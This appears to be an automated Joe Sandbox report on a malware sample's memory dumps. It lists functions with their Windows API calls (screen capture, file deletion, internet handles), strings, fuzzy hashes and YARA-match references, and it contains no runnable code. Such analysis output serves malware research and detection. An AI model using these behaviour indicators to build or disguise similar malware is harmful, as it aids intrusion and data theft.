Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __errno$Message___crt__getptd_noexit__invoke_watson_if_error__invoke_watson_if_oneof_raise_wcscpy_s
String ID: QP#$`r@$n#@$n#@$n#@$n#@$n#@$n#@
API String ID: 1308758192-46180747
Opcode ID: 2461502eb715ff7599928029a8ade488d316d128b4b8fd269882071301a35061
Instruction ID: b7fc949670298f43cf3bc8be79e7bc6415f0d6b645119a4239e0c2d5dbdbef19
Opcode Fuzzy Hash: 2461502eb715ff7599928029a8ade488d316d128b4b8fd269882071301a35061
Instruction Fuzzy Hash: 65415474E44228ABDB24DB91DC46FDA7374AB88704F1040EAF219772C1D6B86EC0CF59

Uniqueness

Uniqueness Score: -1.00%

Function 02088D44 Relevance: 25.9, APIs: 17, Instructions: 387filewindowCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 02088D68
GetClientRect.USER32(?,?), ref: 02088EE6
SetStretchBltMode.GDI32(?,00000004), ref: 02088EEF
SelectObject.GDI32(?,00000000), ref: 02088F61
GetObjectW.GDI32(00000000,00000018,?), ref: 02088F9E

Part of subcall function 0208A905: LocalFree.KERNEL32(00000000,?,?,02082C15), ref: 0208A968

Part of subcall function 0208A76A: GlobalFree.KERNEL32(02082C15), ref: 0208A7B7

LocalFree.KERNEL32(00000000), ref: 020890AD
CloseHandle.KERNEL32(?), ref: 020890B8
DeleteFileW.KERNEL32(?), ref: 020890BF
LocalFree.KERNEL32(?), ref: 020890C6
LocalFree.KERNEL32(?), ref: 020890D0
LocalFree.KERNEL32(00000000), ref: 020891A8
LocalFree.KERNEL32(?), ref: 020891B2
LocalFree.KERNEL32(?), ref: 020891BC
LocalFree.KERNEL32(?), ref: 020891C3
LocalFree.KERNEL32(?), ref: 020891CD
DeleteObject.GDI32(00000000), ref: 020891D4
DeleteObject.GDI32(?), ref: 020891DE

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: Free$Local$Object$Delete$ClientCloseDesktopFileGlobalHandleModeRectSelectStretchWindow
String ID:
API String ID: 2245241583-0
Opcode ID: 167d8230b01a19888c30f1c1acb982bd4371131abcba0e45631bba1b62aed7e1
Instruction ID: 59fd9a66e1886513b34083cec1feefde1a7ea98aecb68db8e3db8a9c388a7608
Opcode Fuzzy Hash: 167d8230b01a19888c30f1c1acb982bd4371131abcba0e45631bba1b62aed7e1
Instruction Fuzzy Hash: 52D13C71104310AFE705EFA6DE44E3B7BF9EB89710F004D29FA54E7260D7B499209B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0208AA41 Relevance: 25.3, APIs: 20, Instructions: 347COMMON

Download Yara Rule

APIs

Part of subcall function 0208A64B: LocalFree.KERNEL32(00000000,?,02083FAD,00000002,?), ref: 0208A6B0

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02087E04), ref: 0208AD93

Part of subcall function 0208B3DE: LocalFree.KERNEL32(00000000), ref: 0208B4C4
Part of subcall function 0208B3DE: LocalFree.KERNEL32(?), ref: 0208B740
Part of subcall function 0208B3DE: FindClose.KERNEL32(00000000), ref: 0208B747

LocalFree.KERNEL32(?), ref: 0208AD8C

Part of subcall function 0208A76A: GlobalFree.KERNEL32(02082C15), ref: 0208A7B7

LocalFree.KERNEL32(00000000), ref: 0208AD62
LocalFree.KERNEL32(?), ref: 0208AD6B
LocalFree.KERNEL32(?), ref: 0208AD74
LocalFree.KERNEL32(?), ref: 0208AD7D
LocalFree.KERNEL32(02087E04,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02087E04), ref: 0208AD9C
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02087E04), ref: 0208ADA5
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02087E04), ref: 0208ADAE
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02087E04), ref: 0208ADB7
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02087E04), ref: 0208ADC0
LocalFree.KERNEL32(02087E04,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02087E04), ref: 0208ADE7
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02087E04), ref: 0208ADF0
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02087E04), ref: 0208ADF9
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02087E04), ref: 0208AE02
LocalFree.KERNEL32(02087E04,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02087E04), ref: 0208AE10
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02087E04), ref: 0208AE19
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02087E04), ref: 0208AE22
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02087E04), ref: 0208AE2B
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02087E04), ref: 0208AE32

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: Free$Local$CloseFindGlobal
String ID:
API String ID: 1000408776-0
Opcode ID: da41649cdfaa69d85f6674120de0b24903d668d69a5e938357de5707fbedf273
Instruction ID: 0ca5119eda1d5f9a4c9f8a80f51d27946aa24735e6f63775531808726a9d4e7f
Opcode Fuzzy Hash: da41649cdfaa69d85f6674120de0b24903d668d69a5e938357de5707fbedf273
Instruction Fuzzy Hash: 49C18672A00215AFDF099FA6DE45EAE7BB5EF48310F044829F905F72A0DB745D20DB68

Uniqueness

Uniqueness Score: -1.00%

Function 02089E40 Relevance: 25.3, APIs: 20, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cef58336c127519e834a542057a8c6bde7dd657260fd76d22c0132126a0d320
Instruction ID: c9c2c4556e180cd2b15c1ba1ea80810e157b0520ea0c974d0ab74e78fc931d45
Opcode Fuzzy Hash: 0cef58336c127519e834a542057a8c6bde7dd657260fd76d22c0132126a0d320
Instruction Fuzzy Hash: 49A1E472A00215BFDF01ABAADE44EAF7BB5EB48310F144525F615F32A0CBB46D10DB69

Uniqueness

Uniqueness Score: -1.00%

Function 020851E5 Relevance: 25.3, APIs: 20, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c78de96184f9a35f28283014b90c132c45570b675f53bf2a6977543753af1da
Instruction ID: 397f81d63cf60881fdfd01073ac74fcfc277ed2f90bc16317c8a711013564cc5
Opcode Fuzzy Hash: 1c78de96184f9a35f28283014b90c132c45570b675f53bf2a6977543753af1da
Instruction Fuzzy Hash: A5A1F672A00215BFDB01ABAADE45FAF7BB5EB48310F104524F615F32A0DBB06D10DB69

Uniqueness

Uniqueness Score: -1.00%

Function 02083EF6 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

., xrefs: 02084094

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 8eb8ff996c082bd78e62886e718282b1ca5e0bd6b9d0ceec2433230310415ef2
Instruction ID: b5589eb889d1dd19e11656fcfb4a60f4f97aa24d3931daae1ed93af306f6620d
Opcode Fuzzy Hash: 8eb8ff996c082bd78e62886e718282b1ca5e0bd6b9d0ceec2433230310415ef2
Instruction Fuzzy Hash: DF919271A00215AFDF089FA5DE48EBE7BB5EB48300F044928E915B72A0DB746D25DF68

Uniqueness

Uniqueness Score: -1.00%

Function 020888B3 Relevance: 24.2, APIs: 14, Strings: 2, Instructions: 247COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?,?,?,?,?,?,?,02087C4A), ref: 02088A89
LocalFree.KERNEL32(?,?,?,?,?,?,?,02087C4A), ref: 02088A97
LocalFree.KERNEL32(00000000), ref: 02088AAE
LocalFree.KERNEL32(00000000), ref: 02088AB9
LocalFree.KERNEL32(00000000), ref: 02088AC4
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,02087C4A), ref: 02088AF4
LocalFree.KERNEL32(?,?,?,?,?,?,?,02087C4A), ref: 02088B0A
LocalFree.KERNEL32(?,?,?,?,?,?,?,02087C4A), ref: 02088B22
LocalFree.KERNEL32(00000000), ref: 02088B31
LocalFree.KERNEL32(00000000), ref: 02088B3C
LocalFree.KERNEL32(00000000), ref: 02088B47
LocalFree.KERNEL32(?,?,?,?,?,?,?,02087C4A), ref: 02088B59
LocalFree.KERNEL32(00000000), ref: 02088B68
LocalFree.KERNEL32(00000000), ref: 02088B77

Strings

@W_, xrefs: 02088A35
.dll, xrefs: 02088A4E

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID: .dll$@W_
API String ID: 2826327444-2218238153
Opcode ID: 95061837a91f269392e0105e5022292588c8a9051f5e52f426446199278b41c2
Instruction ID: 535693adbd0df6c286d34d9c0c1e23ca44b08a27b57d4d7da9a388dc6346cb5b
Opcode Fuzzy Hash: 95061837a91f269392e0105e5022292588c8a9051f5e52f426446199278b41c2
Instruction Fuzzy Hash: C08196B1A003199BEB05EFA5DE84E6F77F9EB44700F448825E941F3290DB74E911DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0042FC37 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 241COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0042FC3B
__get_printf_count_output.LIBCMTD ref: 0042FC49
__errno.LIBCMTD ref: 0042FCAF
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0042FCE5
_write_multi_char.LIBCMTD ref: 0043025E
_write_string.LIBCMTD ref: 00430279
_write_multi_char.LIBCMTD ref: 004302A5
_wctomb_s.LIBCMTD ref: 00430322

Strings

-, xrefs: 004301FE

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: Locale_write_multi_char$UpdateUpdate::~___errno__get_printf_count_output_get_int_arg_wctomb_s_write_string
String ID: -
API String ID: 577823877-2547889144
Opcode ID: 652433eaeae366e57fac5596ad03d7ff55dff337ab454d0776fc57a10d137009
Instruction ID: c1e4325090ae09e2a12d4ba6091b322c4b4b1f9f650ebbe9855a593ce12e5e41
Opcode Fuzzy Hash: 652433eaeae366e57fac5596ad03d7ff55dff337ab454d0776fc57a10d137009
Instruction Fuzzy Hash: 5AA1A070E012289BEB20DF55CC59BEEB7B0AB48304F5042EAE4197A291D7789EC4CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00406AF4 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 187filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

LocalFree.KERNEL32(00000000), ref: 00406BA0
wsprintfW.USER32 ref: 00406C85
lstrlenW.KERNEL32 ref: 00406C92
LocalFree.KERNEL32(?), ref: 00406CAF
DeleteFileW.KERNEL32(?), ref: 00406CE9
LocalFree.KERNEL32(?), ref: 00406CF4
LocalFree.KERNEL32(00000000), ref: 00406CFF
LocalFree.KERNEL32(00000000), ref: 00406D0B
DeleteFileW.KERNEL32(?), ref: 00406D12
LocalFree.KERNEL32(?), ref: 00406D19

Strings

FALSE, xrefs: 00406C65
TRUE, xrefs: 00406C6A, 00406C75

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile$lstrlenwsprintf
String ID: FALSE$TRUE
API String ID: 4168217763-1412513891
Opcode ID: 3e7edbd9208a0259e4667482a832f1f55e0663a8d91dd5371913d0c8ccaf7064
Instruction ID: c49cda921923e69c5166418a1bf50fcb18860fb3db535930a4ec2c5e5cba73ac
Opcode Fuzzy Hash: 3e7edbd9208a0259e4667482a832f1f55e0663a8d91dd5371913d0c8ccaf7064
Instruction Fuzzy Hash: 25619571A00214AFDF049FA1EE44EAE7BB5EF48310F108439F916B72A1DB759D20DB59

Uniqueness

Uniqueness Score: -1.00%

Function 02085541 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 020855A0
LocalFree.KERNEL32(?), ref: 020857E7
LocalFree.KERNEL32(?), ref: 02085807
FindClose.KERNEL32(00000000), ref: 0208580E

Strings

., xrefs: 020855B4

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$CloseFind
String ID: .
API String ID: 3269183270-248832578
Opcode ID: eeb62ecb9f106cfc2f54af98f71ca67650812a65c88e6959245ad390bece3727
Instruction ID: bf247e843079250fbaa8ca16c2cdcee961c56b2cfa57bc5265dc128b91395de1
Opcode Fuzzy Hash: eeb62ecb9f106cfc2f54af98f71ca67650812a65c88e6959245ad390bece3727
Instruction Fuzzy Hash: BD818CB1604301AFE705EF65DD84F6B7BE6EB88714F004D28F695A7290DBB0E910CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0042067C Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 256COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004206C4
__un_inc.LIBCMTD ref: 00420818
__inc.LIBCMTD ref: 0042084A
__inc.LIBCMTD ref: 00420909
__mbtowc_l.LIBCMTD ref: 0042094B
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004215A6

Strings

, xrefs: 00420883
{, xrefs: 004207F2
], xrefs: 004206DD
{, xrefs: 0042088C

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: Locale__inc$UpdateUpdate::~___mbtowc_l__un_inc_memset
String ID: $]${${
API String ID: 2643002128-1336171634
Opcode ID: 38d49781c0c57a9cad80453b4e34d42b7e599b07b36b725049bdf04ed0c535c3
Instruction ID: 7b836b868101b2461060d44305344fa49ed9a12a9ed4976e40d4580e4bd384a3
Opcode Fuzzy Hash: 38d49781c0c57a9cad80453b4e34d42b7e599b07b36b725049bdf04ed0c535c3
Instruction Fuzzy Hash: 4AB1E870E053A89FCF25DBA9D4906EDFBB1AF55304F14819BE4AA6B343C2385A40CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00418CA0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 206COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMTD ref: 00418CB5

Part of subcall function 0041BCB0: __getptd_noexit.LIBCMTD ref: 0041BCB6
Part of subcall function 0041BCB0: __amsg_exit.LIBCMTD ref: 0041BCC6

Strings

n#@, xrefs: 00418EB1, 00418EB7

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __amsg_exit__getptd__getptd_noexit
String ID: n#@
API String ID: 3939802461-1971128777
Opcode ID: 3d0b54772145becba0183ab7bb485930756f4df450446d99cda099476f9c4312
Instruction ID: a2e9a52059b654bc5406d46ef845d4db42a5e7a7c43eaf5afe2c9885acfdba67
Opcode Fuzzy Hash: 3d0b54772145becba0183ab7bb485930756f4df450446d99cda099476f9c4312
Instruction Fuzzy Hash: 3B819FB5A00209ABDF00DF64DC55FEF77B5AF48304F14845EF908A7281D7789A94CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 02086D5B Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 187fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0208A905: LocalFree.KERNEL32(00000000,?,?,02082C15), ref: 0208A968

LocalFree.KERNEL32(00000000), ref: 02086E07
LocalFree.KERNEL32(?), ref: 02086F16
DeleteFileW.KERNEL32(?,?,?,?,?,02086AD2), ref: 02086F50
LocalFree.KERNEL32(?,?,?,?,?,02086AD2), ref: 02086F5B
LocalFree.KERNEL32(00000000,?,?,?,?,02086AD2), ref: 02086F66
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,02086AD2), ref: 02086F72
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,02086AD2), ref: 02086F79
LocalFree.KERNEL32(?,?,?,?,?,?,?,02086AD2), ref: 02086F80

Strings

FALSE, xrefs: 02086ECC
TRUE, xrefs: 02086ED1, 02086EDC

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID: FALSE$TRUE
API String ID: 2194112602-1412513891
Opcode ID: 4de672f5ef5204324d375e2cd98ccb70593393dc9187e84e2e65f519924a5a45
Instruction ID: 7c5d65db235aab595243ffa8be53e9d916330b621e020a9925da2f97c0390686
Opcode Fuzzy Hash: 4de672f5ef5204324d375e2cd98ccb70593393dc9187e84e2e65f519924a5a45
Instruction Fuzzy Hash: 1161A731A00214EFDF059FA1EE84EAE7BB9EF48310F108434F915B72A1DB759921DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00412000 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 109windowCOMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMTD ref: 004120E0
__errno.LIBCMTD ref: 0041210B
__invoke_watson_if_oneof.LIBCMTD ref: 00412113
__errno.LIBCMTD ref: 0041211B
_wcscpy_s.LIBCMTD ref: 00412155
__invoke_watson_if_error.LIBCMTD ref: 0041215E
___crtMessageBoxW.LIBCMTD ref: 00412177
_raise.LIBCMTD ref: 00412190

Strings

T)@, xrefs: 00412058
T)@, xrefs: 004120B4, 004120BA, 004120C9

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __errno$Message___crt__invoke_watson_if_error__invoke_watson_if_oneof__snwprintf_s_raise_wcscpy_s
String ID: T)@$T)@
API String ID: 1843076477-1155104275
Opcode ID: 8929b1f4c9a2aff0a83edb7ae425d7f7bcf08ae553ec47a9f2a36e2b4f1be40b
Instruction ID: c7a4a860db40221b124d43e5a44df49b08fb112f7b311a157247053f3d49ee4d
Opcode Fuzzy Hash: 8929b1f4c9a2aff0a83edb7ae425d7f7bcf08ae553ec47a9f2a36e2b4f1be40b
Instruction Fuzzy Hash: 43417870A40214BBDB24EB90DD4AFDA7374AB48704F0045EAB108B72D1D6FD5AD5CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041200F Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMTD ref: 004120E0
__errno.LIBCMTD ref: 0041210B
__invoke_watson_if_oneof.LIBCMTD ref: 00412113
__errno.LIBCMTD ref: 0041211B
_wcscpy_s.LIBCMTD ref: 00412155
__invoke_watson_if_error.LIBCMTD ref: 0041215E
___crtMessageBoxW.LIBCMTD ref: 00412177
_raise.LIBCMTD ref: 00412190

Strings

T)@, xrefs: 00412058
T)@, xrefs: 004120B4, 004120BA, 004120C9

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __errno$Message___crt__invoke_watson_if_error__invoke_watson_if_oneof__snwprintf_s_raise_wcscpy_s
String ID: T)@$T)@
API String ID: 1843076477-1155104275
Opcode ID: 9fdacd669fdcdafbe7e014797b45e44567de6dd3f312136f34c8ba13df4fe3ba
Instruction ID: 6009be71583d5b4970b192074538a43939151051f19ea94d5b900f3dd88f6011
Opcode Fuzzy Hash: 9fdacd669fdcdafbe7e014797b45e44567de6dd3f312136f34c8ba13df4fe3ba
Instruction Fuzzy Hash: CB417570A40228BBDB24EB90DD49BDA7374AB48704F0045AAB508B72C1D7F95AD5CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00430FAA Relevance: 16.7, APIs: 11, Instructions: 238COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 00430FAE
__get_printf_count_output.LIBCMTD ref: 00430FBC
__errno.LIBCMTD ref: 00431022
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00431058
_write_multi_char.LIBCMTD ref: 004315EB
_write_string.LIBCMTD ref: 00431606
_write_multi_char.LIBCMTD ref: 00431632
__mbtowc_l.LIBCMTD ref: 004316A1

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: Locale_write_multi_char$UpdateUpdate::~___errno__get_printf_count_output__mbtowc_l_get_int_arg_write_string
String ID:
API String ID: 703810477-0
Opcode ID: 83aee01e5547a70ed7e6d9285c6afc650e3112415a577fb90558f1cd27df42b6
Instruction ID: 09345f63ed7e6f9298223f806110a78fac50aadeae85ae894961fc24b627c898
Opcode Fuzzy Hash: 83aee01e5547a70ed7e6d9285c6afc650e3112415a577fb90558f1cd27df42b6
Instruction Fuzzy Hash: D6A17FF0E002189BDB24DF45CC95BEEB3B4AB48304F14519AE6197B292D7789E84CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0042FA85 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 225COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0042FA89
_write_multi_char.LIBCMTD ref: 0043025E
_write_string.LIBCMTD ref: 00430279
_write_multi_char.LIBCMTD ref: 004302A5
_wctomb_s.LIBCMTD ref: 00430322

Strings

-, xrefs: 004301FE

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: _write_multi_char$_get_int_arg_wctomb_s_write_string
String ID: -
API String ID: 557302112-2547889144
Opcode ID: ce3baeaae392aa5525ae5ae748688f599395809c67ab856bd2b4938cabbf0e09
Instruction ID: 97e9e53a55d9c7f2f9b9026c06879c4fc2e96d3f854523c43620616b097d2291
Opcode Fuzzy Hash: ce3baeaae392aa5525ae5ae748688f599395809c67ab856bd2b4938cabbf0e09
Instruction Fuzzy Hash: A7A18F70D012289FDF64CF54CC99BEEB7B1AB48304F5482EAE4096B291D7789E84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00428CB0 Relevance: 15.1, APIs: 10, Instructions: 135COMMON

Download Yara Rule

APIs

_cmpDWORD.LIBCMTD ref: 00428CBE

Part of subcall function 00428F40: _cmpBYTE.LIBCMTD ref: 00428F78

_cmpDWORD.LIBCMTD ref: 00428CE5

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: _cmp
String ID:
API String ID: 2028851527-0
Opcode ID: c8f3e292c3b1e8bb93b3af797200ed8ae75d1eaad313a1fa08ee5c27a5052a11
Instruction ID: c519f4dcc2cb22526c2c3f65a94b32e6156838b2b49557c5b1d95bf76d6f3455
Opcode Fuzzy Hash: c8f3e292c3b1e8bb93b3af797200ed8ae75d1eaad313a1fa08ee5c27a5052a11
Instruction Fuzzy Hash: 18513271A02118EFCB04DFBCEA48A9DBBB5AB40305F91855DE409AB249DB349F44DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0042062A Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

__un_inc.LIBCMTD ref: 00420818
__inc.LIBCMTD ref: 0042084A
__inc.LIBCMTD ref: 00420909
__mbtowc_l.LIBCMTD ref: 0042094B

Strings

, xrefs: 00420883
c, xrefs: 004209C5

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __inc$__mbtowc_l__un_inc
String ID: $c
API String ID: 579247601-3797896886
Opcode ID: 27eaf5ec369bf2605294908d3608e0bb67ffb8760d3954b98b07801aa536f58c
Instruction ID: b9e472e2ce2df36fac2c0f239223ba567e220fd7a13c671cc3a2029d4395fcb2
Opcode Fuzzy Hash: 27eaf5ec369bf2605294908d3608e0bb67ffb8760d3954b98b07801aa536f58c
Instruction Fuzzy Hash: 8091C1B0E04268DBCF24CB95E8946EEB7B1AF55304F54819BD85A6B313C2389E80CF49

Uniqueness

Uniqueness Score: -1.00%

Function 02089B6D Relevance: 12.8, APIs: 10, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d851c9bc5cda07b011c471ba514d21b876054248c69a850a91c851fea1f9c6b3
Instruction ID: 3963969475486cbf0fd910e69d2af61e862dbb1e08a421843f320d9f7d83a926
Opcode Fuzzy Hash: d851c9bc5cda07b011c471ba514d21b876054248c69a850a91c851fea1f9c6b3
Instruction Fuzzy Hash: 5781A372A00219BFDB00FBA5DE44EBF7BB9EB44310F004525FA15E7290DB749911DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 02087EC9 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232networkCOMMON

Download Yara Rule

APIs

InternetCloseHandle.WININET(00000000), ref: 020880A0
InternetCloseHandle.WININET(?), ref: 020880AC
InternetCloseHandle.WININET(00000000), ref: 020880B3
LocalFree.KERNEL32(0000002F), ref: 02088121
LocalFree.KERNEL32(?), ref: 0208812A
LocalFree.KERNEL32(00000000), ref: 02088131

Strings

/, xrefs: 02087F3C

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: CloseFreeHandleInternetLocal
String ID: /
API String ID: 3319388337-2043925204
Opcode ID: 1b3c63f6ad7b7c56e05ea6f413d6885c404e8ecc1f31910e50c1ca249fd4186c
Instruction ID: 4706645c5a28793fc1dfad9dc2c9db9f8d39026579a3ecefbb93fb63b8e37e84
Opcode Fuzzy Hash: 1b3c63f6ad7b7c56e05ea6f413d6885c404e8ecc1f31910e50c1ca249fd4186c
Instruction Fuzzy Hash: BF71E171A00219BFEB15ABA5CD45F7F77B8EB48700F048429FA54FB290E7B0AD509B64

Uniqueness

Uniqueness Score: -1.00%

Function 02086252 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 274COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,02085B3E,?,?,?,00000000,00000000,00000000,00000000), ref: 02086488

Part of subcall function 0208A76A: GlobalFree.KERNEL32(02082C15), ref: 0208A7B7

LocalFree.KERNEL32(?,?,?,?,?,?,?,?,02085B3E,?,?,?,00000000,00000000,00000000,00000000), ref: 02086492
LocalFree.KERNEL32(00000000,?,?,?,?,02085B3E,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 020864D7
